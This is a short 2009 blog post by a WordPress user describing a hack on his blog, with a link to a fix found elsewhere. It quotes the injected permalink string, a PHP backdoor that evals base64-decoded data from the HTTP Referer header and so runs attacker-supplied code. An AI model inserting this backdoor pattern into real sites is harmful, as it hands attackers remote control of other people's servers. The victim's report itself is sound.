Wordpress Blog Hack Warning

by Pat Kitano on October 23, 2009

Suddenly, this Wordpress blog’s feed stopped working and all the permalinks had this strange code embedded at the end of the link: %&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/

I asked on Twitter and Facebook for help (tx James & Kevin for help!). Usually this works.

Screen shot 2009-10-23 at 9.41.46 PM

Upon Googling the above code, I find out the problem is a “MySQL Injection Attack” on Wordpress blogs. Mashable documented it on September 5, but Wordpress and Feedburner forums make no mention of this.

I found the solution to the problem at this link from Andy Sowards: http://bit.ly/2Pkje9. I deleted two posts checking for a solution, and just re-uploaded them now.

{ 1 comment… read it below or add one }

Exhabytab 12.11.09 at 4:20 pm

Waow enjoyed reading your article. I submitted your rss to my blogreader.

Leave a Comment

You can use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>